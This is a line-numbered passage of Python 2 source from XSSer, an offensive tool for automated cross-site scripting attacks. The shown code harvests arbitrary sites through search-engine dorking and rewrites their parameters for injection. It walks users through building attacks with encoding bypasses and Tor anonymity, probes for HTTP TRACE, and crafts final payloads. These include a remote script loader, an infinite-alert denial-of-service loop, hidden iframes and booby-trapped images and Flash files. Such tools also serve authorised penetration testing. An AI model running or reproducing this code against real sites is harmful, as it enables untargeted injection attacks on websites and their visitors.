  2018. except:
  2019. if os.path.exists('core/fuzzing/dorks.txt') == True:
  2020. print '[Error] - Cannot open:', 'dorks.txt', "\n"
  2021. return
  2022. else:
  2023. print '[Error] - Cannot found:', 'dorks.txt', "\n"
  2024. return
  2025. if not options.dork_engine:
  2026. options.dork_engine = 'duck' # default search engine [26-08/2019]
  2027. if options.dork_mass: # massive dorkering
  2028. for e in self.search_engines:
  2029. try:
  2030. dorker = Dorker(e)
  2031. for dork in dorks:
  2032. urls = dorker.dork(dork)
  2033. i = 0
  2034. for u in urls: # replace original parameter for injection keyword (XSS)
  2035. p_uri = urlparse(u)
  2036. uri = p_uri.netloc
  2037. path = p_uri.path
  2038. target_params = parse_qs(urlparse(u).query, keep_blank_values=True)
  2039. for key, value in target_params.iteritems(): # parse params to apply keywords
  2040. for v in value:
  2041. target_params[key] = 'XSS'
  2042. target_url_params = urllib.urlencode(target_params)
  2043. u = p_uri.scheme + "://" + uri + path + "?" + target_url_params
  2044. urls[i] = u
  2045. i = i + 1
  2046. except Exception, e:
  2047. for reporter in self._reporters:
  2048. reporter.mosquito_crashed(dorker.search_url, str(e.message))
  2049. else:
  2050. if urls is not None:
  2051. for url in urls:
  2052. for reporter in self._reporters:
  2053. reporter.add_link(dorker.search_url, url)
  2054. else:
  2055. dorker = Dorker(options.dork_engine)
  2056. try:
  2057. for dork in dorks:
  2058. urls = dorker.dork(dork)
  2059. i = 0
  2060. for u in urls: # replace original parameter for injection keyword (XSS)
  2061. p_uri = urlparse(u)
  2062. uri = p_uri.netloc
  2063. path = p_uri.path
  2064. target_params = parse_qs(urlparse(u).query, keep_blank_values=True)
  2065. for key, value in target_params.iteritems(): # parse params to apply keywords
  2066. for v in value:
  2067. target_params[key] = 'XSS'
  2068. target_url_params = urllib.urlencode(target_params)
  2069. u = p_uri.scheme + "://" + uri + path + "?" + target_url_params
  2070. urls[i] = u
  2071. i = i + 1
  2072. except Exception, e:
  2073. for reporter in self._reporters:
  2074. reporter.mosquito_crashed(dorker.search_url, str(e.message))
  2075. else:
  2076. if urls is not None:
  2077. for url in urls:
  2078. for reporter in self._reporters:
  2079. reporter.add_link(dorker.search_url, url)
  2080. if options.crawling: # crawlering target(s)
  2081. nthreads = options.threads
  2082. self.crawled_urls = list(urls)
  2083. all_crawled = []
  2084. try:
  2085. self.options.crawling = int(self.options.crawling)
  2086. except:
  2087. self.options.crawling = 50
  2088. if self.options.crawler_width == None:
  2089. self.options.crawler_width = 2 # default crawlering-width
  2090. else:
  2091. try:
  2092. self.options.crawler_width = int(self.options.crawler_width)
  2093. except:
  2094. self.options.crawler_width = 2 # default crawlering-width
  2095. if self.options.crawler_local == None:
  2096. self.options.crawler_local = False # default crawlering to LOCAL
  2097. for url in set(urls):
  2098. self.report("\n[Info] Crawlering TARGET:", url, "\n\n - Max. limit: "+ str(self.options.crawling)+ " \n - Deep level: "+ str(options.crawler_width))
  2099. crawler = Crawler(self, Curl, all_crawled,
  2100. self.pool)
  2101. crawler.set_reporter(self)
  2102. # now wait for all results to arrive
  2103. while urls:
  2104. self.run_crawl(crawler, urls.pop(), options)
  2105. while not self._landing:
  2106. for reporter in self._reporters:
  2107. reporter.report_state('broad scanning')
  2108. try:
  2109. self.pool.poll()
  2110. except NoResultsPending:
  2111. crawler.cancel()
  2112. break
  2113. if len(self.crawled_urls) >= int(options.crawling) or not crawler._requests:
  2114. self.report("\n[Info] Found enough results... calling all mosquitoes to home!")
  2115. crawler.cancel()
  2116. break
  2117. time.sleep(0.1)
  2118. # re-parse crawled urls from main
  2119. parsed_crawled_urls = []
  2120. for u in self.crawled_urls:
  2121. if "XSS" in u:
  2122. parsed_crawled_urls.append(u)
  2123. else:
  2124. pass
  2125. self.crawled_urls = parsed_crawled_urls
  2126. # report parsed crawled urls
  2127. self.report("\n" + "-"*25)
  2128. self.report("\n[Info] Mosquitoes have found: [ " + str(len(self.crawled_urls)) + " ] possible attacking vector(s)")
  2129. if self.options.verbose:
  2130. self.report("")
  2131. for u in self.crawled_urls:
  2132. if '/XSS' in u:
  2133. u = u.replace("/XSS", "")
  2134. print " - " + str(u)
  2135. if len(self.crawled_urls) > 0:
  2136. self.report("")
  2137. else:
  2138. self.report("-"*25)
  2139. self.report("\n[Error] XSSer (or your TARGET) is not working properly...\n\n - Firewall\n - Proxy\n - Target offline\n - [?] ...\n")
  2140. return self.crawled_urls
  2141. if not options.imx or not options.flash or not options.xsser_gtk or not options.update:
  2142. return urls
  2143. def run_crawl(self, crawler, url, options):
  2144. def _cb(request, result):
  2145. pass
  2146. def _error_cb(request, error):
  2147. for reporter in self._reporters:
  2148. reporter.mosquito_crashed(url, str(error[0]))
  2149. traceback.print_tb(error[2])
  2150. def crawler_main(args):
  2151. return crawler.crawl(*args)
  2152. crawler.crawl(url, int(options.crawler_width),
  2153. int(options.crawling),options.crawler_local)
  2154. def poll_workers(self):
  2155. try:
  2156. self.pool.poll()
  2157. except NoResultsPending:
  2158. pass
  2159. def try_running(self, func, error, args=[]):
  2160. """
  2161. Try running a function and print some error if it fails and exists with
  2162. a fatal error.
  2163. """
  2164. try:
  2165. return func(*args)
  2166. except Exception, e:
  2167. self.report(error)
  2168. if DEBUG:
  2169. traceback.print_exc()
  2170. def check_trace(self):
  2171. """
  2172. Check for Cross Site Tracing (XST) vulnerability:
  2173. 1) check HTTP TRACE method enabled (add 'Max-Forwards: 0' to curl command to bypass some 'Anti-antixst' web proxy rules)
  2174. 2) check data sent on reply
  2175. """
  2176. agents = [] # user-agents
  2177. try:
  2178. f = open("core/fuzzing/user-agents.txt").readlines() # set path for user-agents
  2179. except:
  2180. f = open("fuzzing/user-agents.txt").readlines() # set path for user-agents when testing
  2181. for line in f:
  2182. agents.append(line)
  2183. agent = random.choice(agents).strip() # set random user-agent
  2184. referer = '127.0.0.1'
  2185. import subprocess, shlex
  2186. self.report('='*75)
  2187. self.report("\n[Info] Trying method: Cross Site Tracing (XST)\n")
  2188. if self.options.xst:
  2189. xst = subprocess.Popen(shlex.split('curl -q -s -i -m 30 -A ' + agent + ' -e ' + referer + ' -X TRACE ' + self.options.xst), stdout=subprocess.PIPE)
  2190. if self.options.target:
  2191. xst = subprocess.Popen(shlex.split('curl -q -s -i -m 30 -A ' + agent + ' -e ' + referer + ' -X TRACE ' + self.options.target), stdout=subprocess.PIPE)
  2192. line1 = xst.stdout.readline()
  2193. if self.options.verbose:
  2194. print "-"*25 + "\n"
  2195. while True:
  2196. line = xst.stdout.readline()
  2197. if line != '':
  2198. print line.rstrip()
  2199. else:
  2200. break
  2201. self.report("")
  2202. self.report('-'*50+"\n")
  2203. if "200 OK" in line1.rstrip():
  2204. print "[Info] Target is vulnerable to XST! (Cross Site Tracing) ;-)\n"
  2205. else:
  2206. print "[Info] Target is NOT vulnerable to XST (Cross Site Tracing) ;-(\n"
  2207. if self.options.target:
  2208. self.report('='*75)
  2209. def start_wizard(self):
  2210. """
  2211. Start Wizard Helper
  2212. """
  2213. #step 0: Menu
  2214. ans1=True
  2215. ans2=True
  2216. ans3=True
  2217. ans4=True
  2218. ans5=True
  2219. ans6=True
  2220. #step 1: Where
  2221. while ans1:
  2222. print("""\nA)- Where are your targets?\n
  2223. [1]- I want to enter the url of my target directly.
  2224. [2]- I want to enter a list of targets from a .txt file.
  2225. *[3]- I don't know where are my target(s)... I just want to explore! :-)
  2226. [e]- Exit/Quit/Abort.
  2227. """)
  2228. ans1 = raw_input("Your choice: [1], [2], [3] or [e]xit\n")
  2229. if ans1 == "1": # from url
  2230. url = raw_input("Target url (ex: http(s)://target.com): ")
  2231. if url.startswith("http"):
  2232. ans1 = None
  2233. else:
  2234. print "\n[Error] Your url is not valid!. Try again!"
  2235. pass
  2236. elif ans1 == "2": # from file
  2237. url = raw_input("Path to file (ex: 'targets_list.txt'): ")
  2238. if url == None:
  2239. print "\n[Error] Your are not providing a valid file. Try again!"
  2240. pass
  2241. else:
  2242. ans1 = None
  2243. elif ans1 == "3": # dorking
  2244. url = "DORKING"
  2245. ans1 = None
  2246. elif (ans1 == "e" or ans1 == "E"):
  2247. print "Closing wizard..."
  2248. ans1=None
  2249. ans2=None
  2250. ans3=None
  2251. ans4=None
  2252. ans5=None
  2253. ans6=None
  2254. else:
  2255. print "\nNot valid choice. Try again!"
  2256. #step 2: How
  2257. while ans2:
  2258. print 22*"-"
  2259. print("""\nB)- How do you want to connect?\n
  2260. [1]- I want to connect using GET and select some possible vulnerable parameter(s) directly.
  2261. [2]- I want to connect using POST and select some possible vulnerable parameter(s) directly.
  2262. [3]- I want to "crawl" all the links of my target(s) to found as much vulnerabilities as possible.
  2263. *[4]- I don't know how to connect... Just do it! :-)
  2264. [e]- Exit/Quit/Abort.
  2265. """)
  2266. ans2 = raw_input("Your choice: [1], [2], [3], [4] or [e]xit\n")
  2267. if ans2 == "1": # using GET
  2268. payload = raw_input("GET payload (ex: '/menu.php?q='): ")
  2269. if payload == None:
  2270. print "\n[Error] Your are providing an empty payload. Try again!"
  2271. pass
  2272. else:
  2273. self.user_template_conntype = "GET"
  2274. ans2 = None
  2275. elif ans2 == "2": # using POST
  2276. payload = raw_input("POST payload (ex: 'foo=1&bar='): ")
  2277. if payload == None:
  2278. print "\n[Error] Your are providing an empty payload. Try again!"
  2279. pass
  2280. else:
  2281. self.user_template_conntype = "POST"
  2282. ans2 = None
  2283. elif ans2 == "3": # crawlering
  2284. payload = "CRAWLER"
  2285. ans2 = None
  2286. elif ans2 == "4": # crawlering
  2287. payload = "CRAWLER"
  2288. ans2 = None
  2289. elif (ans2 == "e" or ans2 == "E"):
  2290. print "Closing wizard..."
  2291. ans2=None
  2292. ans3=None
  2293. ans4=None
  2294. ans5=None
  2295. ans6=None
  2296. else:
  2297. print "\nNot valid choice. Try again!"
  2298. #step 3: Proxy
  2299. while ans3:
  2300. print 22*"-"
  2301. print("""\nC)- Do you want to be 'anonymous'?\n
  2302. [1]- Yes. I want to use my proxy and apply automatic spoofing methods.
  2303. [2]- Anonymous?. Yes!!!. I have a TOR proxy ready at: http://127.0.0.1:8118.
  2304. *[3]- Yes. But I haven't any proxy. :-)
  2305. [4]- No. It's not a problem for me to connect directly to the target(s).
  2306. [e]- Exit/Quit.
  2307. """)
  2308. ans3 = raw_input("Your choice: [1], [2], [3], [4] or [e]xit\n")
  2309. if ans3 == "1": # using PROXY + spoofing
  2310. proxy = raw_input("Enter proxy [http(s)://server:port]: ")
  2311. ans3 = None
  2312. elif ans3 == "2": # using TOR + spoofing
  2313. proxy = 'Using TOR (default: http://127.0.0.1:8118)'
  2314. proxy = 'http://127.0.0.1:8118'
  2315. ans3 = None
  2316. elif ans3 == "3": # only spoofing
  2317. proxy = 'Proxy: No - Spoofing: Yes'
  2318. ans3 = None
  2319. elif ans3 == "4": # no spoofing
  2320. proxy = 'Proxy: No - Spoofing: No'
  2321. ans3 = None
  2322. elif (ans3 == "e" or ans3 == "E"):
  2323. print "Closing wizard..."
  2324. ans3=None
  2325. ans4=None
  2326. ans5=None
  2327. ans6=None
  2328. else:
  2329. print "\nNot valid choice. Try again!"
  2330. #step 4: Bypasser(s)
  2331. while ans4:
  2332. print 22*"-"
  2333. print("""\nD)- Which 'bypasser(s' do you want to use?\n
  2334. [1]- I want to inject XSS scripts without any encoding.
  2335. [2]- Try to inject code using 'Hexadecimal'.
  2336. [3]- Try to inject code mixing 'String.FromCharCode()' and 'Unescape()'.
  2337. [4]- I want to inject using 'Character Encoding Mutations' (Une+Str+Hex).
  2338. *[5]- I don't know exactly what is a 'bypasser'... But I want to inject code! :-)
  2339. [e]- Exit/Quit.
  2340. """)
  2341. ans4 = raw_input("Your choice: [1], [2], [3], [4], [5] or [e]xit\n")
  2342. if ans4 == "1": # no encode
  2343. enc = "Not using encoders"
  2344. ans4 = None
  2345. elif ans4 == "2": # enc: Hex
  2346. enc = 'Hex'
  2347. ans4 = None
  2348. elif ans4 == "3": # enc: Str+Une
  2349. enc = 'Str+Une'
  2350. ans4 = None
  2351. elif ans4 == "4": # enc: Mix: Une+Str+Hex
  2352. enc = "Une,Str,Hex"
  2353. ans4 = None
  2354. elif ans4 == "5": # enc: no encode
  2355. enc = 'Not using encoders'
  2356. ans4 = None
  2357. elif (ans4 == "e" or ans4 == "E"):
  2358. print "Closing wizard..."
  2359. ans4=None
  2360. ans5=None
  2361. ans6=None
  2362. else:
  2363. print "\nNot valid choice. Try again!"
  2364. #step 5: Exploiting
  2365. while ans5:
  2366. print 22*"-"
  2367. print("""\nE)- Which final code do you want to 'exploit' on vulnerabilities found?\n
  2368. [1]- I want to inject a classic "Alert" message box.
  2369. [2]- I want to inject my own scripts.
  2370. *[3]- I don't want to inject a final code... I just want to discover vulnerabilities! :-)
  2371. [e]- Exit/Quit.
  2372. """)
  2373. ans5 = raw_input("Your choice: [1], [2], [3] or [e]xit\n")
  2374. if ans5 == "1": # alertbox
  2375. script = 'Alertbox'
  2376. ans5 = None
  2377. elif ans5 == "2": # manual
  2378. script = raw_input("Enter code (ex: '><script>alert('XSS');</script>): ")
  2379. if script == None:
  2380. print "\n[Error] Your are providing an empty script to inject. Try again!"
  2381. pass
  2382. else:
  2383. ans5 = None
  2384. elif ans5 == "3": # no exploit
  2385. script = 'Not exploiting code'
  2386. ans5 = None
  2387. elif (ans5 == "e" or ans5 == "E"):
  2388. print "Closing wizard..."
  2389. ans5=None
  2390. ans6=None
  2391. else:
  2392. print "\nNot valid choice. Try again!"
  2393. #step 6: Final
  2394. while ans6:
  2395. print 22*"-"
  2396. print "\nVery nice!. That's all. Your last step is to -accept or not- this template.\n"
  2397. print "A)- Target:", url
  2398. print "B)- Payload:", payload
  2399. print "C)- Privacy:", proxy
  2400. print "D)- Bypasser(s):", enc
  2401. print "E)- Final:", script
  2402. print("""
  2403. [Y]- Yes. Accept it and start testing!.
  2404. [N]- No. Abort it?.
  2405. """)
  2406. ans6 = raw_input("Your choice: [Y] or [N]\n")
  2407. if (ans6 == "y" or ans6 == "Y"): # YES
  2408. start = 'YES'
  2409. print 'Good fly... and happy "Cross" hacking !!! :-)\n'
  2410. ans6 = None
  2411. elif (ans6 == "n" or ans6 == "N"): # NO
  2412. start = 'NO'
  2413. print "Aborted!. Closing wizard..."
  2414. ans6 = None
  2415. else:
  2416. print "\nNot valid choice. Try again!"
  2417. if url and payload and proxy and enc and script:
  2418. return url, payload, proxy, enc, script
  2419. else:
  2420. return
  2421. def create_fake_image(self, filename, payload):
  2422. """
  2423. Create -fake- image with code injected
  2424. """
  2425. options = self.options
  2426. filename = options.imx
  2427. payload = options.script
  2428. image_xss_injections = ImageInjections()
  2429. image_injections = image_xss_injections.image_xss(options.imx , options.script)
  2430. return image_injections
  2431. def create_fake_flash(self, filename, payload):
  2432. """
  2433. Create -fake- flash movie (.swf) with code injected
  2434. """
  2435. options = self.options
  2436. filename = options.flash
  2437. payload = options.script
  2438. flash_xss_injections = FlashInjections()
  2439. flash_injections = flash_xss_injections.flash_xss(options.flash, options.script)
  2440. return flash_injections
  2441. def create_gtk_interface(self):
  2442. """
  2443. Create GTK Interface
  2444. """
  2445. options = self.options
  2446. from core.gtkcontroller import Controller, reactor
  2447. uifile = "xsser.ui"
  2448. controller = Controller(uifile, self)
  2449. self._reporters.append(controller)
  2450. if reactor:
  2451. reactor.run()
  2452. else:
  2453. import gtk
  2454. gtk.main()
  2455. return controller
  2456. def run(self, opts=None):
  2457. """
  2458. Run xsser.
  2459. """
  2460. self._landing = False
  2461. for reporter in self._reporters:
  2462. reporter.start_attack()
  2463. if opts:
  2464. options = self.create_options(opts)
  2465. self.set_options(options)
  2466. if not self.mothership and not self.hub:
  2467. self.hub = HubThread(self)
  2468. self.hub.start()
  2469. options = self.options
  2470. # step -1; order attacks
  2471. if self.options.hash: # not fuzzing/heuristic when hash precheck
  2472. self.options.fuzz = False
  2473. self.options.script = False
  2474. self.options.coo = False
  2475. self.options.xsa = False
  2476. self.options.xsr = False
  2477. self.options.dcp = False
  2478. self.options.dom = False
  2479. self.options.inducedcode = False
  2480. self.options.heuristic = False
  2481. if self.options.heuristic: # not fuzzing/hash when heuristic precheck
  2482. self.options.fuzz = False
  2483. self.options.script = False
  2484. self.options.coo = False
  2485. self.options.xsa = False
  2486. self.options.xsr = False
  2487. self.options.dcp = False
  2488. self.options.dom = False
  2489. self.options.inducedcode = False
  2490. self.options.hash = False
  2491. if self.options.Cem: # parse input at CEM for blank spaces
  2492. self.options.Cem = self.options.Cem.replace(" ","")
  2493. # step 0: third party tricks
  2494. try:
  2495. if self.options.imx: # create -fake- image with code injected
  2496. p = self.optionParser
  2497. self.report('='*75)
  2498. self.report(str(p.version))
  2499. self.report('='*75)
  2500. self.report("[Image XSS Builder]...")
  2501. self.report('='*75)
  2502. self.report(''.join(self.create_fake_image(self.options.imx, self.options.script)))
  2503. self.report('='*75 + "\n")
  2504. except:
  2505. return
  2506. if options.flash: # create -fake- flash movie (.swf) with code injected
  2507. p = self.optionParser
  2508. self.report('='*75)
  2509. self.report(str(p.version))
  2510. self.report('='*75)
  2511. self.report("[Flash Attack! XSS Builder]...")
  2512. self.report('='*75)
  2513. self.report(''.join(self.create_fake_flash(self.options.flash, self.options.script)))
  2514. self.report('='*75 + "\n")
  2515. if options.xsser_gtk:
  2516. self.create_gtk_interface()
  2517. return
  2518. if self.options.wizard: # start a wizard helper
  2519. p = self.optionParser
  2520. self.report('='*75)
  2521. self.report(str(p.version))
  2522. self.report('='*75)
  2523. self.report("[Wizard] Generating XSS attack...")
  2524. self.report('='*75)
  2525. self.user_template = self.start_wizard()
  2526. if self.options.xst: # check for cross site tracing
  2527. p = self.optionParser
  2528. if not self.options.target:
  2529. self.report('='*75)
  2530. self.report(str(p.version))
  2531. self.report('='*75)
  2532. self.report("[XST Attack!] checking for HTTP TRACE method ...")
  2533. self.report('='*75)
  2534. self.check_trace()
  2535. if options.checktor:
  2536. url = self.check_tor_url # TOR status checking site
  2537. print '='*75
  2538. print ""
  2539. print " _ "
  2540. print " /_/_ .'''. "
  2541. print " =O(_)))) ...' `. "
  2542. print " \_\ `. .'''"
  2543. print " `..' "
  2544. print ""
  2545. print '='*75
  2546. agents = [] # user-agents
  2547. try:
  2548. f = open("core/fuzzing/user-agents.txt").readlines() # set path for user-agents
  2549. except:
  2550. f = open("fuzzing/user-agents.txt").readlines() # set path for user-agents when testing
  2551. for line in f:
  2552. agents.append(line)
  2553. agent = random.choice(agents).strip() # set random user-agent
  2554. referer = "127.0.0.1"
  2555. print "\nSending request to: " + url + "\n"
  2556. print "-"*25+"\n"
  2557. headers = {'User-Agent' : agent, 'Referer' : referer} # set fake user-agent and referer
  2558. try:
  2559. import urllib2
  2560. req = urllib2.Request(url, None, headers)
  2561. tor_reply = urllib2.urlopen(req).read()
  2562. your_ip = tor_reply.split('<strong>')[1].split('</strong>')[0].strip() # extract public IP
  2563. if not tor_reply or 'Congratulations' not in tor_reply:
  2564. print("It seems that Tor is not properly set.\n")
  2565. print("IP address appears to be: " + your_ip + "\n")
  2566. else:
  2567. print("Congratulations!. Tor is properly being used :-)\n")
  2568. print("IP address appears to be: " + your_ip + "\n")
  2569. except:
  2570. print("[Error] Cannot reach TOR checker system!. Are you connected?\n")
  2571. sys.exit(2) # return
  2572. nthreads = max(1, abs(options.threads))
  2573. nworkers = len(self.pool.workers)
  2574. if nthreads != nworkers:
  2575. if nthreads < nworkers:
  2576. self.pool.dismissWorkers(nworkers-nthreads)
  2577. else:
  2578. self.pool.createWorkers(nthreads-nworkers)
  2579. for reporter in self._reporters:
  2580. reporter.report_state('scanning')
  2581. # step 1: get urls
  2582. urls = self.try_running(self._get_attack_urls, "\n[Error] Internal error getting -targets-\n")
  2583. for reporter in self._reporters:
  2584. reporter.report_state('arming')
  2585. # step 2: get payloads
  2586. payloads = self.try_running(self.get_payloads, "\n[Error] Internal error getting -payloads-\n")
  2587. for reporter in self._reporters:
  2588. reporter.report_state('cloaking')
  2589. if options.Dwo:
  2590. payloads = self.process_payloads_ipfuzzing(payloads)
  2591. elif options.Doo:
  2592. payloads = self.process_payloads_ipfuzzing_octal(payloads)
  2593. for reporter in self._reporters:
  2594. reporter.report_state('locking targets')
  2595. # step 3: get query string
  2596. query_string = self.try_running(self.get_query_string, "\n[Error] Internal problems getting query -string-\n")
  2597. for reporter in self._reporters:
  2598. reporter.report_state('sanitize')
  2599. urls = self.sanitize_urls(urls)
  2600. for reporter in self._reporters:
  2601. reporter.report_state('attack')
  2602. # step 4: perform attack
  2603. self.try_running(self.attack, "\n[Error] Internal problems running attack...\n", (urls, payloads, query_string))
  2604. for reporter in self._reporters:
  2605. reporter.report_state('reporting')
  2606. if len(self.final_attacks):
  2607. self.report("[Info] Waiting for tokens to arrive...")
  2608. while self._ongoing_requests and not self._landing:
  2609. if not self.pool:
  2610. self.mothership.poll_workers()
  2611. else:
  2612. self.poll_workers()
  2613. time.sleep(0.2)
  2614. for reporter in self._reporters:
  2615. reporter.report_state('final sweep...')
  2616. if self.pool:
  2617. self.pool.dismissWorkers(len(self.pool.workers))
  2618. self.pool.joinAllDismissedWorkers()
  2619. start = time.time()
  2620. while not self._landing and len(self.final_attacks) and time.time() - start < 5.0:
  2621. time.sleep(0.2)
  2622. for reporter in self._reporters:
  2623. reporter.report_state('landing... '+str(int(5.0 - (time.time() - start))))
  2624. if self.final_attacks:
  2625. self.report("-"*25+"\n")
  2626. self.report("[Info] Generating 'token' url:\n")
  2627. for final_attack in self.final_attacks.itervalues():
  2628. if not final_attack['url'] == None:
  2629. self.report(final_attack['url'] , "\n")
  2630. self.report("="*50+"\n")
  2631. self.report("[Info] CONGRATULATIONS!!! <-> This vector is doing a remote connection... So, is: 100% VULNERABLE! ;-)\n")
  2632. self.report(",".join(self.successful_urls), "\n")
  2633. self.report("="*50 + "\n")
  2634. for reporter in self._reporters:
  2635. reporter.end_attack()
  2636. self.report("="*50)
  2637. if self.mothership:
  2638. self.mothership.remove_reporter(self)
  2639. self.report("Mosquito(es) landed!")
  2640. else:
  2641. self.report("Mosquito(es) landed!")
  2642. self.report("="*50)
  2643. self.print_results()
  2644. def sanitize_urls(self, urls):
  2645. all_urls = set()
  2646. if urls is not None:
  2647. for url in urls:
  2648. if url.startswith("http://") or url.startswith("https://"):
  2649. self.urlspoll.append(url)
  2650. all_urls.add(url)
  2651. else:
  2652. if self.options.crawling:
  2653. self.report("[Error] This target URL: (" + url + ") is not correct! [DISCARDED]\n")
  2654. else:
  2655. self.report("\n[Error] This target URL: (" + url + ") is not correct! [DISCARDED]\n")
  2656. url = None
  2657. else:
  2658. self.report("\n[Error] Not any valid source provided to start a test... Aborting!\n")
  2659. return all_urls
  2660. def land(self, join=False):
  2661. self._landing = True
  2662. if self.hub:
  2663. self.hub.shutdown()
  2664. if join:
  2665. self.hub.join()
  2666. self.hub = None
  2667. def _prepare_extra_attacks(self, payload):
  2668. """
  2669. Setup extra attacks.
  2670. """
  2671. options = self.options
  2672. agents = [] # user-agents
  2673. try:
  2674. f = open("core/fuzzing/user-agents.txt").readlines() # set path for user-agents
  2675. except:
  2676. f = open("fuzzing/user-agents.txt").readlines() # set path for user-agents when testing
  2677. for line in f:
  2678. agents.append(line)
  2679. extra_agent = random.choice(agents).strip() # set random user-agent
  2680. extra_referer = "127.0.0.1"
  2681. extra_cookie = None
  2682. if self.options.script:
  2683. if 'XSS' in payload['payload']:
  2684. payload['payload'] = payload['payload'].replace("XSS","PAYLOAD")
  2685. if 'PAYLOAD' in payload['payload'] or 'XSS' in payload['payload']:
  2686. if options.xsa:
  2687. hashing = self.generate_hash('xsa')
  2688. agent = payload['payload'].replace('PAYLOAD', hashing)
  2689. self._ongoing_attacks['xsa'] = hashing
  2690. self.xsa_injection = self.xsa_injection + 1
  2691. self.options.agent = agent
  2692. extra_agent = agent
  2693. self.extra_hashed_injections[hashing] = "XSA", payload['payload']
  2694. if options.xsr:
  2695. hashing = self.generate_hash('xsr')
  2696. referer = payload['payload'].replace('PAYLOAD', hashing)
  2697. self._ongoing_attacks['xsr'] = hashing
  2698. self.xsr_injection = self.xsr_injection + 1
  2699. self.options.referer = referer
  2700. extra_referer = referer
  2701. self.extra_hashed_injections[hashing] = "XSR", payload['payload']
  2702. if options.coo:
  2703. hashing = self.generate_hash('cookie')
  2704. cookie = payload['payload'].replace('PAYLOAD', hashing)
  2705. self._ongoing_attacks['coo'] = hashing
  2706. self.coo_injection = self.coo_injection + 1
  2707. self.options.cookie = cookie
  2708. extra_cookie = cookie
  2709. self.extra_hashed_injections[hashing] = "COO", payload['payload']
  2710. return extra_agent, extra_referer, extra_cookie
  2711. def attack(self, urls, payloads, query_string):
  2712. """
  2713. Perform an attack on the given urls with the provided payloads and
  2714. query_string.
  2715. """
  2716. for url in urls:
  2717. if self.pool:
  2718. self.poll_workers()
  2719. else:
  2720. self.mothership.poll_workers()
  2721. if not self._landing:
  2722. self.attack_url(url, payloads, query_string)
  2723. def generate_real_attack_url(self, dest_url, description, method, hashing, query_string, payload, orig_url):
  2724. """
  2725. Generate a real attack url by using data from a successful test.
  2726. This method also applies DOM stealth mechanisms.
  2727. """
  2728. user_attack_payload = payload['payload']
  2729. if self.options.finalpayload:
  2730. user_attack_payload = self.options.finalpayload
  2731. elif self.options.finalremote:
  2732. user_attack_payload = '<script src="' + self.options.finalremote + '"></script>'
  2733. elif self.options.finalpayload or self.options.finalremote and payload["browser"] == "[Data Control Protocol Injection]":
  2734. user_attack_payload = '<a href="data:text/html;base64,' + b64encode(self.options.finalpayload) + '></a>'
  2735. elif self.options.finalpayload or self.options.finalremote and payload["browser"] == "[Induced Injection]":
  2736. user_attack_payload = self.options.finalpayload
  2737. if self.options.dos:
  2738. user_attack_payload = '<script>for(;;)alert("You were XSSed!!");</script>'
  2739. if self.options.doss:
  2740. user_attack_payload = '<meta%20http-equiv="refresh"%20content="0;">'
  2741. if self.options.b64:
  2742. user_attack_payload = '<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4">'
  2743. if self.options.onm:
  2744. user_attack_payload = '"style="position:absolute;top:0;left:0;z-index:1000;width:3000px;height:3000px" onMouseMove="' + user_attack_payload
  2745. if self.options.ifr:
  2746. user_attack_payload = '<iframe src="' + user_attack_payload + '" width="0" height="0"></iframe>'
  2747. do_anchor_payload = self.options.anchor
  2748. anchor_data = None
  2749. attack_hash = None
  2750. if do_anchor_payload: # DOM Shadows!
  2751. dest_url, agent, referer, cookie = self.get_url_payload(orig_url, payload, query_string, user_attack_payload)
  2752. dest_url = dest_url.replace('?', '#')
  2753. else:
  2754. dest_url, agent, referer, cookie = self.get_url_payload(orig_url, payload, query_string, user_attack_payload)
  2755. if attack_hash:
  2756. self.final_attacks[attack_hash] = {'url':dest_url}
  2757. return dest_url
  2758. def token_arrived(self, attack_hash):
  2759. if not self.mothership:
  2760. # only the mothership calls on token arriving.
  2761. self.final_attack_callback(attack_hash)
  2762. def final_attack_callback(self, attack_hash):
  2763. if attack_hash in self.final_attacks:
  2764. dest_url = self.final_attacks[attack_hash]['url']
  2765. self.report('[*] Browser check:', dest_url)
  2766. for reporter in self._reporters:
  2767. reporter.add_checked(dest_url)
  2768. if self._reporter:
  2769. from twisted.internet import reactor
  2770. reactor.callFromThread(self._reporter.post, 'SUCCESS ' + dest_url)
  2771. self.final_attacks.pop(attack_hash)
  2772. def apply_postprocessing(self, dest_url, description, method, hashing, query_string, payload, orig_url):
  2773. real_attack_url = self.generate_real_attack_url(dest_url, description, method, hashing, query_string, payload, orig_url)
  2774. #generate_shorturls = self.options.shorturls
  2775. #if generate_shorturls:
  2776. # shortener = ShortURLReservations(self.options.shorturls)
  2777. # if self.options.finalpayload or self.options.finalremote or self.options.b64 or self.options.dos:
  2778. # shorturl = shortener.process_url(real_attack_url)
  2779. # self.report("[/] Shortered URL (Final Attack):", shorturl)
  2780. # else:
  2781. # shorturl = shortener.process_url(dest_url)
  2782. # self.report("[/] Shortered URL (Injection):", shorturl)
  2783. return real_attack_url
  2784. def report(self, *args):
  2785. args = list(map(lambda s: str(s), args))
  2786. formatted = " ".join(args)
  2787. if not self.options.silent:
  2788. print(formatted)
  2789. for reporter in self._reporters:
  2790. reporter.post(formatted)
  2791. def print_results(self):
  2792. """
  2793. Print results from attack.
  2794. """
  2795. self.report('\n' + '='*75)
  2796. total_injections = len(self.hash_found) + len(self.hash_notfound)
  2797. if len(self.hash_found) + len(self.hash_notfound) == 0:
  2798. pass
  2799. elif self.options.heuristic:
  2800. pass
  2801. else:
  2802. self.report("[*] Final Results:")
  2803. self.report('='*75 + '\n')
  2804. self.report("- Injections:", total_injections)
  2805. self.report("- Failed:", len(self.hash_notfound))
  2806. self.report("- Successful:", len(self.hash_found))
  2807. try:
  2808. _accur = len(self.hash_found) * 100 / total_injections
  2809. except ZeroDivisionError:
  2810. _accur = 0
  2811. self.report("- Accur: %s %%\n" % _accur)
  2812. if not len(self.hash_found) and self.hash_notfound:
  2813. self.report('='*75 + '\n')
  2814. pass
  2815. else:
  2816. self.report('='*75)
  2817. self.report("[*] List of XSS injections:")
  2818. self.report('='*75 + '\n')
  2819. if self.options.reversecheck:
  2820. self.report("You have found: [ " + str(len(self.hash_found)) + " ] XSS vector(s)! -> [100% VULNERABLE]\n")
  2821. else:
  2822. self.report("You have found: [ " + str(len(self.hash_found)) + " ] possible (without --reverse-check) XSS vector(s)!\n")
  2823. self.report("---------------------" + "\n")
  2824. if self.options.fileoutput:
  2825. fout = open("XSSreport.raw", "w") # write better than append
  2826. for line in self.hash_found:
  2827. if self.options.heuristic or self.options.hash: # not final attack possible when checking
  2828. pass
  2829. else:
